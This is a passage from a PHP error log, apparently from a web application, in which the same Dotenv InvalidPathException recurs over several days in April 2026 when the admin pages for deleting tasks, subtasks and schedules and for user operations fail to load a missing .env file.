/home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:37:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:38:42 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:44:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:46:06 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:51:52 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:53:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:57:38 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:58:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 10:59:40 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:01:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:01:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:01:33 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:01:42 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:02:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:02:44 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/user_operations.php(9): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:10:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:12:56 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 11:15:23 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 14:10:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 14:37:39 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 15:00:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 15:15:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 08:42:16 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 08:42:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:15:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:16:15 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:18:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:19:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:23:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 11:24:29 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 11:53:45 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:05:33 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:49:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:50:04 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:50:24 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 14:47:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:39:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/ignore_subtasks.php(7): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:39:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:39:32 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/emeraadmin/delete_schedule.php(10): ScheduleService->__construct() #4 {main} thrown in 